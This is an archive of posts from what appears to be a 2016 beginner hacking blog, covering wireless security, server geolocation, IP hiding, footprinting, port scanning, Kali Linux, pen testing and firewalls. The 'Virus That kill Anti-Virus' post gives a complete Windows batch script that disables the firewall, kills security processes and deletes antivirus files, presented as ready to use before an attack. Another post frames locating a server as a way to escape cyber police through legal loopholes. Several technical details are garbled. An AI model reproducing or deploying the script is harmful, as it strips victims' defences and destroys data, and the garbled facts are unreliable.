Showing posts with label hackerbazzz. Show all posts
Showing posts with label hackerbazzz. Show all posts

Thursday, 9 June 2016

Wireless Hacking

Wireless Hacking

Hello Friends, Today we are going to study "Wireless Hacking". Wireless networks are all around , from home to corporate server farms. They make our lives by avoiding physical connectivity to networks via cables while providing guaranteed consistent network connectivity of devices. It is an advantage with a certain danger attached to it . Wireless network are prone to hacking attacks. We will examine a couple of strategies to secure wireless networks to accomplish satisfactory security.


How do Wireless Network Work ?

Before we discuss wireless network security and weakness, we must understand the fundamental radio transmission and the IEEE 820.11 protocol, regularly known as the WLAN protocol. This protocol connects two or more devices within the short range, Using radio signals. to set up a wireless network, you require a wireless access point and a wireless network card for every device to be connected. The access point is also referred as a Hotspot. It consists of a radio transmitter which is used for transmitting and receiving signals, additionally it also contains hardware which converts data signals to radio signals & vice versa.

we can access a wireless network using wireless network enabled device such as a laptop, tablet, smartphones etc. within the transmission range of a wireless point. most of the device have the wireless network option enabled by default.

you can connect to any wireless network if it is not password protected. if it is password protected then you will need the password to gain access.

Wireless network Authentication 

As the wireless network network is open to every body who has a wireless network enabled gadget, most network are now configured with some kind of encryption and authentication mechanisms.

Let's take a look at some of the commonly used wireless authentication techniques.

WEP

WEP is the acronym for wired equivalent privacy. It was developed for IEEE 802.11 WLAN standards. Its objective was to provide data protection similar or equivalent to that provided by wired networks. WEP encrypts the data, When transmitted over the networks to keep it safe.

WEP Weakness

WEP has significant design flaws and vulnerabilities 

  • WEP is based on passwords which makes it vulnerable to dictionary based attacks.
  • WEP uses R encryption algorithm to create stream ciphers. The stream Cipher input is made of an initial value (iv) and a secret key. The length of the initial value (iv) is 24 bits long while the secret key can either be 40 bits or 140 bits long. The total length of both the initial value and secret can either be 64 bits or 128 bits long. The lower possible value of the secret key makes it easy to crack it.
  • Weak initial values combination don't encrypt adequately.
  • Initial values can be reused.

WPA

WPA stands for WI-FI Procted access. It is A security Protocol developed through The WI-FI alliance in response to the weakness found in WEP. It is used to encrypt data on 802.11 WLAN's. It uses higher initial values 48 bits as an alternative to the 24 bits that WEP uses. It uses temporary Keys to encrypt packets.

WPA Weakness

  • The collision avoidance implementation can be broken.
  • It is vulnerable to DoS attacks.
  • Pre-shared keys Use passphrases. Weak passphrases are vulnerable to dictinary based attacks.
If you like my post & my Blog Please Comment and review it 
______________Thank You________________

Finding The location Of a Server

Finding The location Of a Server

Hello Friends, Today i am going to Show to How to Find the location of a Server. This is very Important step in hacking a Server. In a Case you got caught by Cyber Police you can get rid out of the case from the loopholes in Cyber Laws of that country. It will Only happen when you know the Cyber law of that Country this is only possible when you know the location of the server.


  

Pre-requisite

  • A Computer installed with OS
  • Internet Connection 

What is a Web server ?

A web server is a computer system that processes requests via HTTP, the basic network protocol used to distribute information on the World Wide Web. The term can refer to the entire system, or specifically to the software that accepts and supervises the HTTP requests.

The primary function of a web server is to store, process and deliver web pages to clients. The communication between client and server takes place using the Hypertext Transfer Protocol (HTTP). Pages delivered are most frequently HTML documents, which may include images, style sheets and scripts in addition to text content.

Steps to Find The Location Of a Server

1- Open Your Web Browser.

2- Search For "www.iplocation.org".

3- "iplocation.org" Looks like This


4- Give the Target Domain or IP Address.


5- Click on IP lookup.

6- It will show you Result Like This.

You can See that It shows the IP Address Of the Target & Country, Region, City .

[Note]
This Tutorial Is Only for Educational Purpose.

If you like my Blog, My Post's Please leave a Comment 
____________________________________Thank You ____________________________________

Tuesday, 31 May 2016

How to Hide IP Address in Android

How to Hide IP Address in Android 

Hello Friends, Today I am Going to show you How to Hide IP Address in Android . We should Hide Our IP address for some Security reasons like :-


  • For Hiding Geographical Location.
  • To Prevent Web Tracking.
  • To avoid Leaving a Digital Footprint.
  • To Bypass Blocked Sites on their IP Address.
This Tutorials Is only for Educational Purpose. I will not Responsible any Damage done to your Android Handset

Introduction


Internet has Become so common these days that most of the people take it for granted. While everyone spends hours on internet, only a few online seems to care about their security When they are Online. Cyber Security has become one of the burning issues in this decade and your security is always in your hand. The small measure we take towards secure browsing will have a huge impact. using strong password, Hiding your IP address are some of the security measure you can follow, while the first one is self explanatory in this article I will show you how you can hide your IP address in your PC and Smartphone 



What Is IP address ?

An Internet Protocol address (IP address) is a numerical label assigned to each device (Computer, Printer) participating in a computer network that uses the Internet Protocol for communication. An IP address serves two principal functions: host or network interface identification and location addressing. Its role has been characterized as follows: "A name indicates what we seek. An address indicates where it is. A route indicates how to get there."

Why you should Hide IP Address ?

You may have your own reasons for hiding your IP Address, but here are a few technical reasons why people hide their public IP Address.

Hiding your IP Address is a good step in Protecting Yourself Online. I don't Want you to think it's Useless, But it's Certainly not the definitive measure that keeps your Online status Anonymous or Protected. 

We should Hide Our IP address for some Security reasons like :-
  • For Hiding Geographical Location.
  • To Prevent Web Tracking.
  • To avoid Leaving a Digital Footprint.
  • To Bypass Blocked Sites on their IP Address.

The only true way to remain anonymous online is to not even connect to the internet. :)

How to Hide IP Address In Android ?

The most Comman way to hide IP and Safe guard your Online identity in an android device is to download and install any VPN app from the Google Play Store. Some of the best VPN application that you can use are given below.
  • Hostspot shield Free VPN Proxy.
  • TunnelBear VPN 
  • Hideman VPN 
  • Tigervpns Free VPN and Proxy.
  • Free & Premium VPN - Finch VPN
  • Betternet Unlimited Free VPN

Tuesday, 3 May 2016

How to Find Information of a Website

How to Find Information of a Website

Hello Friends, I am Mahak Bhawsar a Ethical Hacker. I am Back with some New Hacking Tutorials. In this post we are Going to Study How we can Find Information of Website. As u all knows that Foot printing is first step for a Hacker. Foot Printing mean gathering information of our target.



In this Tutorial we Gonna Find Information of Website like :-
  • Its Domain  
  • Its Name server 
  • IP of Server
  • IP of Name Server
  • Its Hosting Company
  • Its Domain Registrar
  • Which Web server they are using 
  • OS of Web server

Pre-requisite

Steps

1. Select the target Website & copy the Domain of the website. Ex www.microsoft.com 
2. Go the www.netcraft.com & paste the domain.


3. After Pasting Domain Click arrow & wait for Result. 
4. You will get Result like this




5. You will get some Information Through this Website & for some more Information we will use a tool called DNS Data View.
6. Download the tool from Internet and Install it.
7. Run the application as Administration.


8. When you start application you will see this Window.


9. Give the target Domain Ex zoomgroup.com & click OK.


10. Wait for some time you will get Result like this.

_________________Thank You_________________


How to Find Available Ports on a IP

How to Find Available Ports on a IP

Hello Friends, Today we are going to Find the Available pots On a IP. This is most important step for hacking a Web Server. After doing this we are able to see What services are On on a IP.


What are Ports ?

In programming, a port is a "logical connection place" and specifically, using the Internet's protocol, TCP/IP, the way a client program specifies a particular server program on a computer in a network.

A port is always associated with an IP address of a host and the protocol type of the communication and thus completes the destination or origination address of a communication session. A port is identified for each address and protocol by a 16-bit number, commonly known as the port number.

Specific port number are often used to identify specific services. Of the thousand of enumerated ports, 1024 well-known port number are reserved by convention to identify specific service type on a host. The protocol that primarily use ports are the transport layer protocol, such as the transmission Control Protocol (TCP) and the user Datagram prot (UDP) of the Internet protocol suite.

Pre-requisite


Steps :-

1. Select an Target IP which you want to Scan.
2. Download & Install Advance Port Scanner Tool.
3. Run Advance Port Scanner Tool as Administrator you will Find Tool in start menu after Installation.



4. After Opening Tool you will Get this Window. This Window is for Scanning range of IP's if you want to Scan only One IP Please Un-check Use range option.


5. After Un-checking Use range option you will get this Window.


6. Give the target IP & click on Scan Option to start Scanning.


7. It shows Scanning in bottom. We have to wait for some time.
8. After Scanning It shows Result like this.

If you like My Blog-Spot, My Tutorials Please give me your Feed Back as a Comment.
___________________Thank You___________________

Monday, 2 May 2016

Virus That kill Anti-Virus

Virus That kill Anti-Virus

Hello Friends, Today we are going to make a virus which will kill or disable the Anti-virus. This will be very Help full when we are going to attack prior attack we just have to execute the virus this will disable the Anti-virus & we have more chances for making our attack successful.

Warning

Please don't try to run this Virus on your computer it can harm your computer. I will not be Responsible for any damage done to your Computer. This virus is only for Education purpose. Please don't use it with wrong purpose.

What is Anti-Virus

Antivirus or anti-virus software, sometimes known as anti-malware software, is computer software used to prevent, detect and remove malicious software.
Antivirus software was originally developed to detect and remove computer viruses, hence the name. However, with the proliferation of other kinds of malware, antivirus software started to provide protection from other computer threats. In particular, modern antivirus software can protect from: malicious Browser Helper Objects (BHOs), browse, Virus, Trojan, Root Kits.

What id Killing Anti-virus ?

Killing Anti-virus mean Disabling the Anti-virus. Which mean after killing our antivirus will not run. and our computer is not protected.

Pre-requisite

  • Computer Installed with OS
  • Notepad

Steps to Create Virus

1. Go to the Start.
2. Open Notepad
3. Copy & paste the code given below.

____________CODE____________
@ echo off
rem —
rem RIP Anti Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files
ood32krn\*.exe
del /Q /F C:\Program Files
ood32\*.exe
cls
del /Q /F C:\Program Files
od32
del /Q /F C:\Program Files
ood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem —
____________________________________________

5. Save the File with ".bat" Extension.
6. Now your Virus is ready to use.


[NOTE] Please don't try to run this Virus on your computer it can harm your computer. I will not be Responsible for any damage done to your Computer. This virus is only for Education purpose. Please don't use it with wrong purpose.

___________________________________Thank You___________________________________

Sunday, 1 May 2016

Countermeasure Technique For Malware

Countermeasure Technique For Malware

Hello Friends, Today We are going to Study the Countermeasure technique for Malware. How can we protect our Computer from Malware. What Countermeasure Techniques we need to Protect our self.

It is always a cat and mouse game between malicious hackers hackers and security administrators. The one who is netter equipped has a greater chance of winning.

This post deals with some of the tools are absolutely necessary protect host in risky environments.



Anti-Virus

We all know this - antivirus is essential. Antivirus software installed on a client scans all the local files to check for virus infections. The antivirus has a database of all known virus which will be used to determine the virus infections on the device

Anti-Worm

Anti-worm is a software that can installed on a client device which scans all the local files to check for worm infection . This too relies on a database of known worms to find out infection.

Anti-Trojan

Anti-Trojan software scans all the local files to check for Trojans. Trojans are hidden programs which latch on to legitimate programs.

These Trojans can be detected by the Anti-Trojan software which maintains a database of all known Trojans.

Internet Security Suit

Internet security suit is an application that inspects a device (Laptop, Desktop, Mobile, Tablet) for different kinds of malware like Viruses, Worms, Trojans, Adware etc. Different vendors also include a personal firewall in the suit which can be used to control the traffic flow to and the device and also to control which application can get network access.

Host-based Intrusion detection system

A host-based intrusion detection system (HIDS) is an intrusion detection system that monitors and analyses the network of a computing system as well as (in some cases) the network packets on its network interfaces. A host-based IDS monitors all or parts of the dynamic behaviour and the state of a computer system A. HIDS might look at the state of a system, Its stored information whether in RAM in the file system, log files or else where and check that contents of these appear as expected.

Host Based Intrusion Prevention System

A host based intrusion prevention system (HIPS) is an intrusion prevention system that monitors and analyses the internals of a computing system as well as (in some cases) the network packets on its network interface for any malicious traffic or attacks targeted to the host and attempts to block it.

KALI Linux

KALI Linux

Hello Friends, Today we are going to Study KALI Linux. KALI Linux is very important to become a Good hacker. Kali Linux is widely used by Hacker to Hack device.


What is KALI Linux ?

KALI Linux is a Debian based distribution specifically Designed foe Penetration testing and Digital Forensics. KALI Linux is an update distribution of the ever popular Backtrack Linux Distribution. It is developed by Offensive security and contains useful tool useful for penetration testing.

How is KALI Linux is different from other Distribution ?

KALI Linux is a specialized Linux Distribution designed for penetration testing and most of the tools in KALI Linux requires running them as "root". Installing and running application as a root user is not recommended as there is a serious security threat if the user isn't aware of what activities are being performed.

What are the use of KALI Linux ?

Kali Linux can be used to perform penetration testing on a network or a host or can also br used by hackers to launch attacks on vulnerable host.

What is Metasploit Framework ?

Metasploit Framework is an open source tool used to develop and execute exploit on a vulnerable host. It was initially written by HD MOORE in the year 2003 using Perl. In 2007 it was re-written using Ruby.

Metasploit Framework can be used to identify vulnerabilities and exploit vulnerable hosts. Metasploit Framework contains over 500 exploits for window, Linux, Unix, Mac, OS, Android etc.

Metasploit Frame work can be used via the command line interface. There is also an application called 'Amritage' that can be used as a Graphical User Interface for Metasploit.

Penetration Testing

Penetration Testing
Hello Friends, Today i am going to teach you what is Penetration Testing, types of penetration Testing, What is to be Tested 


What is Penetration Testing ?

A penetration test, also known as pen test is a legal attempts at gaining access to your protected computer system or network often conducted by a third party organisation.

The purpose of the test is to identify security vulnerabilities and them attempt to successfully exploit them in order to gain some form of access to the network or computer system.

Penetration tests are carried out by using manual or automated software to safely compromise server endpoint, web application, wireless network, network device, mobile device and other potential risk points. if a tester is able to successfully exploit the vulnerabilities on a target system. they may attempt to use the vulnerable system to launch further attacks ? exploits on other internal resources, by getting deeper access and information via privilege escalation.

 A pen tester will generated a detail reported about successful exploited security vulnerabilities via penetration testing. The generated reports is then given to network & security administrators of organization to take necessary remediation steps for enhancing security by security and patching vulnerabilities.

The main purpose f penetration testing is to verify the impact on the resources and operation of the network in case of any hacking and how to minimize the affect of the same

Types of Penetration Tests

Penetration test can be classified into various types.

1. Network Services test 

This is the most common type of penetration test, Used for finding target system on a network, Finding loopholes / vulnerabilities in the operating system and network services and later exploiting them remotely. Networking service penetration test is done from a remote location through the internet targeting the organization's perimeter network. Sometime these tests are done from the local network to assess the security of the internal network from the perspective of the internal user.

2.Client-side Test

This kind of penetration test is used ti find and exploit vulnerabilities on client-side application like web browser, media player, etc. On a target network.

3. Web application test

This kind pf penetration test is used to find security vulnerabilities in the web server, web based application and programs on a target network 

4. Remote dial-up war dial

This kind of penetration test is used to discover modems. It ites to get connected to the modem by password guessing or brute forcing the target network.

5. Wireless security test

This kind of penetration test is used to discover wireless access points with in range and finding and exploiting the security weakness of access points on a target network.

6. Social Engineering test

This kind of Penetration test is used to gather sensitive information such as a password or other important and confidential data directly from a user. This is old style conning, trying to fool users into revealing their personal information. this type of test may be conducted over the phone or email, targeting-organization users or employee and evaluating security procedures and process.

________________________________Thank You________________________________

Friday, 29 April 2016

Understanding Firewall & IDS

Understanding Firewall & IDS

Business try to protect Their resources with a number of tools and devices. It is the Job of the Ethical Hacker to understand how they so that they can be fortified , if found vulnerable after an ethical hacking attack.

Firewall



What is Firewall ?

Firewall is an appliance or an application that controls the flow of traffic from private network to public network based on the rules configured. The Firewall acts a a barrier between secured internal network and public networks.
Newer Generation firewall can do much more than just controlling network traffic they can block unwanted websites, stop viruses from being download and also filter spam massages.

What are the functions of a Firewall ?

The Primary Function of a Firewall is to control the Flow of Traffic between different Network.

It also does Network Address Translation (NAT) for all requests coming from local (LAN) Networks going to the Internet and also checks whether this user or host is allowed to access the Internet.
For example, If a web page is requested by a local PC , then that requested has to be Natted to a public IP address and approve by the Firewall to reach the Internet. The response coming back from the webserver has to be accepted by the Firewall. Only then can the web page be displayed on the host.

Firewall can also handle Virtual Private Network (VPN) Connections to establish a secure communication channel between different network.

User authentication is also Firewall feature , used to verify users before giving access to resources on other networks.

Intrusion Prevention System


What is IDS ?

Intrusion prevention systems (IPS), also known as intrusion detection and prevention systems (IDPS), are network security appliances that monitor network and/or system activities for malicious activity. The main functions of intrusion prevention systems are to identify malicious activity, log information about this activity, attempt to block/stop it, and report it.
There are network based (NIDS) and host based (HIDS) intrusion detection systems. 

How does an IDS work

An Intrusion detection system (IDS) has attack signatures provided by the vendor. Every request Received by the IDS will be Compared against all the signature to identify a know attacks.

IDS also does a heuristic analysis to identify any malicious traffic patterns, but this requires the IDS to learn the normal traffic patterns, but this requires the IDS to learn the normal traffic patterns to a specific server or a specific service.

Span

Switched port Analyser (SPAN) also called as a port mirroring is a method of transmitting a copy of all packets received on one port of a network switch to another port for analysis.

Span has to be configured on the network switch to capture traffic On IDS for inspection.

IDS Tools

There are different IDS tools available, the most popular ones are Snort, OSSIM (Open Source Security Information Management) and Sguil.